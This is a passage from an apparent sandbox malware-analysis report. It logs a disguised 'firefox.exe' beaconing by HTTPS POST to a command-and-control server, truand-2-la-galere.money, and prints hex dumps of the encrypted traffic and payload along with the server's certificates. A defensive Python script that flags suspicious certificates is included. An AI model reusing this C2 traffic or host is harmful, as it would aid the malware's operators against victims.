    0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65
    0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6
    0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83
    0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1
    0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90
    0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83
    0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31
    01A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86
    01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C
    01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38
    01D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03
    01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14
    01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63


Timestamp:    May 7, 2018 14:49:58.977407932 CEST
Source Port:  443
Dest Port:    49165
Source IP:    91.92.137.74
Dest IP:      192.168.1.81
Subject:      CN=truand-2-la-galere.money
Issuer:       CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
NotBefore:    Sun May 06 14:49:49 CEST 2018
NotAfter:     Mon May 06 14:49:49 CEST 2019
Raw:          byte-for-byte the same leaf certificate (serial 0311340b 93cf92e2 c28a4c49 0bc38176 5929, 1024-bit RSA with public exponent 3, SHA1withRSA) that the server presented on the 14:49:49 connection to port 49162; see that entry for the full dump.


Timestamp:    May 7, 2018 14:49:58.977407932 CEST
Source Port:  443
Dest Port:    49165
Source IP:    91.92.137.74
Dest IP:      192.168.1.81
Subject:      CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
Issuer:       CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
NotBefore:    Tue Mar 17 15:16:38 CET 2015
NotAfter:     Thu Mar 09 15:16:38 CET 2045
Raw:          byte-for-byte the same self-signed CA certificate (serial d21ef1f6 e34f6bb8, 4096-bit RSA, SHA1withRSA, valid 2015 to 2045) that was presented on the 14:49:49 connection to port 49162; see that entry for the full dump.
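The two certificates above are printed but not assessed. The properties a responder would pull out of them are all in the Raw column: a 1024-bit RSA leaf with public exponent 3 signed with SHA1withRSA, a NotBefore exactly 24 hours before the handshake (Sun May 06 14:49:49 versus a handshake at May 7 14:49:49, i.e. the leaf was minted for this connection and backdated a day), and a private, self-signed root with a 30-year lifetime and no path-length limit. The script below is an added example and not part of the report or of any tool mentioned in it: it parses the Java-style dump exactly as the Raw column prints it and applies those checks. The two dump strings are copied from the report with the RSA moduli replaced by "<elided>" (only the bit length is needed), and the thresholds (2048 bits, 24 hours, 10 years) are this example's choices.

```python
"""Parse the certificate dumps from the HTTPS Packets table and flag what stands out."""
import re
from datetime import datetime, timedelta

# Copied from the report's Raw column; moduli elided, trailing extensions abbreviated.
LEAF_DUMP = (
    "[[ Version: V3 Subject: CN=truand-2-la-galere.money Signature Algorithm: SHA1withRSA, "
    "OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: <elided> "
    "public exponent: 3 Validity: [From: Sun May 06 14:49:49 CEST 2018, To: Mon May 06 "
    "14:49:49 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe "
    "Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: "
    "[ 0311340b 93cf92e2 c28a4c49 0bc38176 5929]Certificate Extensions: 6 ... "
    "BasicConstraints:[ CA:false PathLen: undefined] ... "
    "SubjectAlternativeName [ DNSName: truand-2-la-galere.money] ..."
)
CA_DUMP = (
    "[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security "
    "Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, "
    "OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: <elided> "
    "public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 "
    "15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe "
    "Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: "
    "[ d21ef1f6 e34f6bb8]Certificate Extensions: 3 ... "
    "BasicConstraints:[ CA:true PathLen:2147483647] ..."
)
# Handshake time from the packet row (CEST, the same zone as the leaf's validity dates).
HANDSHAKE = datetime(2018, 5, 7, 14, 49, 49)


def parse_java_date(text: str) -> datetime:
    """'Sun May 06 14:49:49 CEST 2018' -> naive datetime; the zone token is dropped
    because all dates on the page are printed in the same local zone."""
    parts = text.split()
    del parts[4]
    return datetime.strptime(" ".join(parts), "%a %b %d %H:%M:%S %Y")


def parse_dump(dump: str) -> dict:
    """Pull the fields the checks need out of the X509Certificate.toString() text."""
    def grab(pattern, cast=str):
        m = re.search(pattern, dump)
        return cast(m.group(1)) if m else None

    subject, sigalg = re.search(r"Subject: (.+?) Signature Algorithm: (\S+),", dump).groups()
    not_before, not_after = re.search(r"Validity: \[From: (.+?), To: (.+?)\]", dump).groups()
    return {
        "subject": subject,
        "issuer": grab(r"Issuer: (.+?) SerialNumber"),
        "sigalg": sigalg,
        "bits": grab(r"(\d+) bits modulus", int),
        "exponent": grab(r"public exponent: (\d+)", int),
        "not_before": parse_java_date(not_before),
        "not_after": parse_java_date(not_after),
        "is_ca": grab(r"CA:(true|false)") == "true",
        "pathlen": grab(r"PathLen:\s*(\d+|undefined)"),
        "san": re.findall(r"DNSName: ([^\]\s]+)", dump),
    }


def assess(cert: dict, handshake: datetime) -> list:
    """Return the list of finding codes that apply to one parsed certificate."""
    findings = []
    if cert["sigalg"].upper().startswith("SHA1"):
        findings.append("sha1-signature")
    if cert["bits"] < 2048:
        findings.append("rsa-key-under-2048")
    if cert["exponent"] == 3:
        findings.append("public-exponent-3")
    if cert["subject"] == cert["issuer"]:
        findings.append("self-signed")
    if cert["is_ca"] and cert["pathlen"] == "2147483647":
        findings.append("unconstrained-pathlen")  # Java prints Integer.MAX_VALUE for "no limit"
    age = handshake - cert["not_before"]
    if timedelta(0) <= age <= timedelta(days=1):
        findings.append("issued-within-24h-of-handshake")
    if cert["not_after"] - cert["not_before"] > timedelta(days=10 * 365):
        findings.append("validity-over-10-years")
    return findings


def chain_links(leaf: dict, ca: dict) -> bool:
    """True when the leaf names the CA as its issuer and the CA asserts CA:true."""
    return leaf["issuer"] == ca["subject"] and ca["is_ca"]


if __name__ == "__main__":
    for name, dump in (("leaf", LEAF_DUMP), ("ca", CA_DUMP)):
        cert = parse_dump(dump)
        print(name, cert["subject"], assess(cert, HANDSHAKE))
```

Run against the two dumps, the leaf yields sha1-signature, rsa-key-under-2048, public-exponent-3 and issued-within-24h-of-handshake; the CA yields sha1-signature, self-signed, unconstrained-pathlen and validity-over-10-years. The 24-hour check is the one worth keeping in a detection pipeline: a server that presents a leaf born a day before every connection is generating certificates on demand, which no public CA does.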


HTTPS Proxied Packets

Session ID   Source IP      Source Port   Destination IP   Destination Port   Process
0            192.168.1.81   49162         91.92.137.74     443                C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe


Timestamp   kBytes transferred   Direction   Data

2018-05-07 12:49:50 UTC   0   OUT
  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
  Host: truand-2-la-galere.money
  Content-Length: 0
  Cache-Control: no-cache

2018-05-07 12:49:50 UTC   0   IN
  HTTP/1.1 200 OK
  Server: nginx/1.6.2
  Date: Mon, 07 May 2018 12:50:03 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close

2018-05-07 12:49:50 UTC   0   IN
  Data Raw: 32 38 0d 0a 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 289ec9be34fd447911df7464ecd88bd89434f6c10c0 (a chunked body: chunk size 0x28, the 40-byte value 9ec9be34fd447911df7464ecd88bd89434f6c10c, then the terminating 0 chunk; the CR/LF separators are dropped in the ASCII column)

Session ID   Source IP      Source Port   Destination IP   Destination Port   Process
1            192.168.1.81   49164         91.92.137.74     443                C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp   kBytes transferred   Direction   Data

2018-05-07 12:49:52 UTC   0   OUT
  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
  Host: truand-2-la-galere.money
  Content-Length: 9
  Cache-Control: no-cache

2018-05-07 12:49:52 UTC   0   OUT
  Data Raw: 5b 0c 0d 45 0b 0b 47 07 54
  Data Ascii: [EGT (non-printable bytes dropped)

2018-05-07 12:49:52 UTC   0   IN
  HTTP/1.1 200 OK
  Server: nginx/1.6.2
  Date: Mon, 07 May 2018 12:50:05 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close

2018-05-07 12:49:52 UTC 0 IN Data Raw: 31 66 63 30 0d 0a 74 3f f3 39 61 65 33 34 62 64 34 34 c8 c6 31 31 dc 66 37 34 36 34 65 63 24 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 c6 34 65 63 6a 27 82 6c 64 8c 30 f9 12 8c 67 7a ae 10 64 0b 50 16 43 49 10 0a 54 46 07 09 14 57 56 57 5f 5e 10 46 55 51 16 46 10 0d 44 51 56 42 20 77 6a 14 5e 5b 02 53 4d 3c 3d 69 1d 65 63 39 62 65 33 34 8e bc 80 14 9b 80 eb 42 c8 df ed 47 9a 8d bf 10 39 47 2d 11 de 81 e3 47 6e 4b 71 45 c6 88 ea 10 64 1a 77 4a 93 dc e9 47 c3 a5 6d 47 98 80 eb 42 c1 a7 7e 47 9d 8d bf 10 c8 81 e3 11 a6 81 e3 47 bc 62 72 45 ca 88 ea 10 b6 33 76 4a d8 dc e9 47 ac 33 27 47 9a 80 eb 42 ae 31 21 47 9b 8d bf 10 36 51 5b 0a c8 81 e3 47 33 34 66 36 63 31 30 63 69 20 63 39 2e 64 36 34 17 Data Ascii: 1fc0t?9ae34bd4411f7464ec$88bd89434f6c10c9ec9be34fd447911df744ecj'ld0gzdPCITFWVW_ FUQFDQVB wj [SM<=iec9be34BG9G-GnKqEdwJGmGB~GGbrE3vJG3'GB1!G6Q[G34f6c10ci c9.d64

2018-05-07 12:49:53 UTC 16 IN Data Raw: 23 cb 13 9c cb 21 2f 9c 36 21 33 99 22 2c 93 33 75 3c 3a b3 fb 39 ad fb 6c bf df b5 8a 2a 62 31 30 34 b2 18 6f bc 9d 10 34 07 a6 8d e8 37 37 39 ba 64 74 ed 72 3c 60 b1 b7 17 6e b3 70 5e ef 4d 35 37 fb df 6e bd 13 0d bb 2e 35 66 93 6a 08 25 00 ef ef 29 d8 5c 37 09 31 31 e1 b4 43 21 c9 45 35 30 37 6f d0 35 4a 38 39 bf f9 b7 a2 2e ea 7c cc 88 0d 0a 32 30 30 30 0d 0a 28 9a 15 69 31 32 cc 21 de c6 33 24 ae b2 fb b8 31 9a be 71 c2 3f a4 6c e0 a5 3b 62 64 bb 44 24 33 5e 26 5e 63 01 30 63 4d 72 0b c9 63 65 33 67 35 33 dc 23 19 39 31 ba ae e5 f3 2c bf 79 95 88 77 50 b8 63 64 38 6a 63 cc 21 de 94 64 21 a9 e8 f3 ec 36 c9 eb 20 db 3f a7 6b b0 6f 34 39 31 b2 19 76 37 67 39 b0 b1 62 64 38 b3 27 88 b3 4c 3c cc 44 32 60 9c 44 cc 9c 4c 91 34 d1 14 4b 33 34 e5 a0 2c b1 f7 Data Ascii: #!/6!3",3u<:9l*b104o4779dtr<`np^M57n.5fj%)\711C!E507o5J89.|2000(i12!3$1q?l;bdD$3 & c0cMrce3g53#91,ywPcd8jc!d!6 ?ko491v7g9bd8'L<D2`DL4K34,

2018-05-07 12:49:53 UTC 32 IN Data Raw: 59 5b e0 66 27 67 65 cb 70 93 c7 3f 28 3d 3a 63 f0 f7 66 bf 8a 61 9c 44 3c 9c 4c 6d 9c 2c 7e c6 34 24 ed 9c b1 cb 43 07 62 ce 11 6a c8 21 d6 96 62 73 9b 4d 28 61 9c 6f c6 21 2f 97 61 26 e8 e9 b5 b8 4d 44 48 e6 34 e8 70 35 36 8c 63 e3 c8 c6 62 ba 94 31 61 f2 32 2a 65 9c 71 34 9b 65 74 bb fd 24 b8 f2 38 6d 3c 6c f3 36 b2 89 9c 0c 7e c5 34 24 99 51 84 94 30 29 ce 44 6c 8e a5 cb c9 cb e6 a7 0d 0a 31 30 30 30 0d 0a 68 65 fb 37 ef d4 81 08 8e 35 76 66 33 ce 45 6b d1 1e 9c c6 9d e6 f7 38 3b a7 61 bf db 6a 67 66 9b 13 3f 07 c0 bf bb 8b df c7 c7 9d ef c0 60 b1 cc 40 78 c9 16 39 d8 ab c6 9a 9c b2 92 3c b6 c2 12 6b cb 41 3b 6f 66 d9 78 66 37 34 b5 f0 69 e8 bc 6f c7 77 d0 9a 3e 24 65 cb 73 82 c1 36 20 3a 60 3a 3d b2 a1 3e 6e f7 33 ef d8 62 bc 4c 21 b4 92 12 20 5e 36 Data Ascii: Y[f'gep?(=:cfaD<Lm,~4$Cbj!bsM(ao!/a&MDH4p56cb1a2*eq4et$8m<l6~4$Q0)Dl1000he75vf3Ek8;ajgf?`@x9<kA;ofxf74iow>$es6 : :=>n3bL! 6

2018-05-07 12:49:53 UTC 48 IN Data Raw: ba 74 6c 47 6a f8 bd 44 59 60 94 0b f8 ef 19 e8 92 9f 98 9f 0e fe 61 31 30 c8 b4 e0 df c2 9d 9a 60 64 8e 98 9c cb c8 ba f5 3d e9 e3 8f cf c9 cb 35 9c 11 c8 ff e7 dc c3 c6 cb 34 34 67 36 9c 24 30 c6 3e 75 e6 f9 6d e1 dc 34 66 64 5e 74 5f 39 01 31 64 99 41 64 c9 42 51 9c 11 d4 c7 77 dc 9a 3e 24 ba 71 9a b3 a3 3e b4 ad 39 65 63 6a 9d 13 67 cb 13 6c 64 cb 42 d5 ce 24 d8 c4 30 24 b3 f4 6a e7 d1 38 38 62 45 65 d1 07 f3 52 5d 70 65 42 0b ee 87 69 62 39 62 ee 34 37 23 6c 5e 34 c8 4e cd 61 ef 21 cf 37 73 c8 35 9c 11 d4 c7 77 d8 9a 3e 24 b6 f4 69 b2 e2 31 30 63 b2 28 8b 36 d5 23 35 75 e5 a3 1c bd 7a d1 0a f9 18 ad ba 71 d2 64 0f 7b e9 7d f4 32 0e 38 c6 41 df cb 73 ca c7 36 20 e6 f9 10 35 69 08 61 be 71 9a 34 bf 71 e7 ba f1 39 34 99 42 d8 c9 21 d9 c1 63 28 bd a2 10 Data Ascii: tlGjDY`a10`d=544g6$0>um4fd t_91dAdBQw>$q>9ecjgldB$0$j88bEeR]peBib9b47#l 4Na!7s5w>$i10c(6#5uzqd{}28As6 5iaq4q94B!c(

2018-05-07 12:49:53 UTC 64 IN Data Raw: 1b 76 e9 7d c8 32 0e 3c c6 41 3b dc 61 28 63 31 b3 a7 35 ee ab d2 72 ee ba a4 66 64 34 bf 72 31 3e 86 68 27 b4 d5 32 b4 18 9f 64 4c 3f e9 21 c0 ba 54 43 c9 ed f7 aa f2 65 e8 d5 e6 5e d1 5d 6d 23 34 13 75 bf 79 3f 98 a9 a7 63 76 38 83 32 7c e6 83 60 65 fb 08 64 c7 4c 3c db bd 99 c9 9c 68 69 3e fa 30 e8 d5 e1 89 2b b9 2b 8c 67 63 c8 4c 3d d9 3b 8e c8 cb bd 69 6d dc 64 39 38 62 5f e7 4a 54 b8 79 8e b5 1a 45 31 1d 2d e8 26 d1 32 0f 32 67 8e e4 29 34 37 b2 7c d9 e7 a2 3b df 3b bf e4 f3 64 38 38 6d d3 3c 61 b7 d3 35 e3 f6 17 2f b0 1e cd 65 e8 b8 f6 65 33 34 69 d2 38 2c 43 3e ba 74 94 e5 57 44 cb bf a4 8a b6 38 38 62 e4 45 cd 34 47 33 ed 7b 93 b2 51 13 c4 ee a0 d0 dc 65 33 34 ed 21 dc b7 4f 4d 30 4f 49 ed f4 f5 ce 3c ec 26 6c b5 75 8a 6b 8e f9 65 63 dc 7e 28 63 Data Ascii: v}2<A;a(c15rfd4r1>h'2dL?!TCe ]m#4uy?cv82| edL<hi>0++gcL=;imd98b_JTyE1-&22g)47|;;d88m<a5/ee34i8,C>tWD88bE4G3{Qe34!OM0OI<&lukec~(c


2018-05-07 12:49:53 UTC 80 IN Data Raw: bc f6 47 32 e7 f8 63 31 34 63 ba 58 8f 06 6a 75 32 3b ea ed 35 34 37 b8 d6 2e 67 6e 34 3b 98 69 91 e8 21 cc 0b ab e0 f8 40 37 59 24 3f 9f 63 33 30 63 4d 66 e0 f0 6a cc 33 30 66 64 40 37 b4 f0 35 98 64 6e 37 34 42 37 e6 aa 66 bd fa 16 67 bb f0 35 9a 34 67 36 63 45 36 e2 f0 65 63 31 62 ee e3 8f 66 04 34 34 14 ea 45 1b e5 9c 37 14 36 34 11 7f e5 c2 38 22 64 38 4d 38 08 e7 13 20 e2 f8 30 60 39 65 88 37 e3 ac 33 36 66 64 df 32 b6 f0 31 30 64 66 5d 74 13 74 e5 63 64 63 13 a1 10 23 14 f4 4c 34 66 42 6f 1a f3 16 2f e4 aa 39 62 65 32 df 0d 0a 38 30 30 30 0d 0a 68 e5 fd 34 37 39 32 da 62 e7 fe 34 36 34 67 e8 a3 1b 45 6a 93 e8 1a f5 38 f3 5d f7 6c b5 85 63 39 65 33 d1 46 98 cc cb 36 ed 71 38 df 95 23 31 64 3f 6e 3b 98 69 69 e8 21 34 0b ab e0 f8 40 37 59 24 3f 9f 63 Data Ascii: G2c14cXju2;547.gn4;i!@7Y$?c30cMfj30fd@75dn74B7fg54g6cE6ec1bf44E7648"d8M8 0`9e736fd210df]ttcdc#L4fBo/9be28000h4792b464gEj8]lc9e3F6q8#1d?n;ii!4@7Y$?c

2018-05-07 12:49:53 UTC 96 IN Data Raw: 10 34 54 2e 66 79 64 61 60 78 29 5f 00 34 41 10 42 43 60 09 07 4f 46 76 7d 34 6a 78 28 6c 55 63 05 27 72 28 2d 0f 53 2f 7d 7e 32 2e 70 34 29 10 0b 28 27 46 70 15 13 0d 7b 27 3a 11 13 5b 43 3b 19 34 7f 02 20 00 29 7c 05 30 76 37 54 39 6a 36 19 67 58 4c 47 0e 14 0e 47 31 22 31 71 7f 7b 79 53 2f 20 6b 68 52 55 73 69 34 25 02 54 15 68 15 6a 4a 38 4e 5a 7a 27 5d 22 34 28 3e 77 71 79 0e 09 7b 3d 27 63 64 72 79 24 5a 64 38 38 62 69 10 1f 10 09 66 1a 15 48 15 07 47 12 5a 5b 41 62 65 33 34 34 33 79 7c 06 08 63 06 25 2b 7f 73 63 01 65 63 7e 1b 01 5a 04 7c 0e 71 0b 30 40 17 59 45 30 63 7e 2b 34 0d 5b 22 62 7e 22 25 73 7a 66 72 31 31 6b 5c 14 70 5e 06 51 5b 59 30 11 4a 5a 24 39 34 01 03 55 0e 27 65 08 27 76 26 3b 6f 2b 20 77 75 3c 64 34 34 57 7a 6e 4a 4f 5f 7f 02 1c Data Ascii: 4T.fyda`x)_4ABC`OFv}4jx(lUc'r(-S/}~2.p4)('Fp{':[C;4 )|0v7T9j6gXLGG1"1q{yS/ khRUsi4%ThjJ8NZz']"4(>wqy{='cdry$Zd88bifHGZ[Abe3443y|c%+scec~Z|q0@YE0c~+4["b~"%szfr11k\p Q[Y0JZ$94U'e'v&;o+ wu<d44WznJO_

2018-05-07 12:49:53 UTC 112 IN Data Raw: 55 34 5a 34 05 36 02 31 44 63 50 65 0c 39 0c 65 1d 34 46 64 7d 34 43 39 11 31 0d 66 44 34 16 34 08 63 0b 38 4b 62 10 38 19 34 5f 34 0f 36 08 31 55 63 55 65 1a 39 42 65 47 34 0e 64 51 34 17 39 43 31 01 66 44 34 43 34 09 63 10 38 18 62 0b 38 5f 34 13 34 05 36 02 31 5c 63 55 65 0a 39 0c 65 54 34 46 64 55 34 59 39 11 31 29 66 64 34 7f 34 29 63 49 38 5b 62 0b 38 54 34 43 34 0f 36 0f 31 55 63 5d 65 43 39 4a 65 1c 34 05 64 58 34 45 39 18 31 44 66 51 34 43 34 0b 63 07 38 4c 62 0d 38 56 34 5d 34 46 36 05 31 42 63 56 65 0e 39 42 65 52 34 46 64 5a 34 56 39 45 31 0d 0a 38 30 30 30 0d 0a 0d 66 41 34 53 34 45 63 07 38 57 62 0a 38 4a 34 47 34 14 36 16 31 53 63 4d 65 0c 39 10 65 13 34 09 64 46 34 17 39 57 31 16 66 58 34 5b 34 45 63 20 38 54 62 08 38 74 34 52 34 0f 36 0d Data Ascii: U4Z461DcPe9e4Fd}4C91fD44c8Kb84_461UcUe9BeG4dQ49C1fD4C4c8b8_4461\cUe9eT4FdU4Y91)fd44)cI8[b8T4C461Uc]eC9Je4dX4E91DfQ4C4c8Lb8V4]4F61BcVe9BeR4FdZ4V9E18000fA4S4Ec8Wb8J4G461ScMe9e4dF49W1fX4[4Ec 8Tb8t4R46

2018-05-07 12:49:53 UTC 128 IN Data Raw: 62 cb 13 88 74 29 84 8a 39 3f 68 c6 10 25 20 94 79 50 ad 01 75 62 6c 4d 1d 0d 7e 20 ed b6 12 f0 31 16 38 24 d3 3b 83 26 53 2d 32 6f 44 36 57 39 41 50 64 8d 38 07 f6 55 35 61 11 39 78 32 a4 0d 1b 3b 47 39 16 37 3e d1 3e 03 3d 33 e8 0c 72 56 e3 34 14 47 5c 26 17 88 30 33 b2 e5 37 49 26 34 6a d4 a4 4c 3d e2 e7 f0 3d df 36 11 9d 66 09 d2 d0 63 c9 66 6f 51 73 50 31 66 53 74 30 27 37 07 81 04 e7 c0 97 54 36 34 2d 63 33 b3 45 6e 10 7d 71 40 33 0f e5 de 60 45 1f e0 d1 65 6f 4d 53 e6 db 09 12 7e 10 19 f4 d9 0e 44 28 87 0a 32 bd 74 aa a2 8d 28 6f 33 35 00 3d 30 d8 0d 44 37 34 ce 60 6b d2 73 4d 09 32 55 73 13 07 64 38 df 17 7c 01 38 d2 f7 3a dc 05 50 c5 42 62 39 98 2e aa c7 69 20 f4 b2 42 25 43 23 61 71 ba db 41 3e 16 6d b8 66 e0 a5 63 df 39 a8 35 ff 24 75 3f 20 de Data Ascii: bt)9?h% yPublM~ 18$;&S-2oD6W9APd8U5a9x2;G97>>=3rV4G\&037I&4jL==6fcfoQsP1fSt0'7T64-c3En}q@3`EeoMS~D(2t(o35=0D74`ksM2Usd8|8:PBb9.i B%C#aqA>mfc95$u?


Copyright Joe Security LLC 2018 Page 67 of 149




Session ID Source IP Source Port Destination IP Destination Port Process

10 192.168.1.81 49175 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe


Timestamp kBytes transferred Direction Data

2018-05-07 12:50:28 UTC 508 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:28 UTC 508 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:28 UTC 508 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:28 UTC 508 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID Source IP Source Port Destination IP Destination Port Process

11 192.168.1.81 49176 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:30 UTC 508 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:30 UTC 509 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:30 UTC 509 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:30 UTC 509 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID Source IP Source Port Destination IP Destination Port Process

12 192.168.1.81 49177 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:32 UTC 509 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:32 UTC 509 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:32 UTC 509 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:32 UTC 509 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID Source IP Source Port Destination IP Destination Port Process

13 192.168.1.81 49178 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:33 UTC 509 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:33 UTC 509 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:33 UTC 509 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:33 UTC 509 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0


Session ID Source IP Source Port Destination IP Destination Port Process

14 192.168.1.81 49179 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:34 UTC 509 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:34 UTC 509 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:35 UTC 509 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:35 UTC 510 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID Source IP Source Port Destination IP Destination Port Process

15 192.168.1.81 49180 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:36 UTC 510 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:36 UTC 510 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:36 UTC 510 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:36 UTC 510 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID Source IP Source Port Destination IP Destination Port Process

16 192.168.1.81 49181 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:37 UTC 510 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:37 UTC 510 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:38 UTC 510 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2018-05-07 12:50:38 UTC 510 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID Source IP Source Port Destination IP Destination Port Process

17 192.168.1.81 49182 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:38 UTC 510 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache

2018-05-07 12:50:38 UTC 510 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P

2018-05-07 12:50:39 UTC 510 IN HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


2018-05-07 12:50:39 UTC 511 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0


Session ID Source IP Source Port Destination IP Destination Port Process

18 192.168.1.81 49183 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp kBytes transferred Direction Data

2018-05-07 12:50:40 UTC 511 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
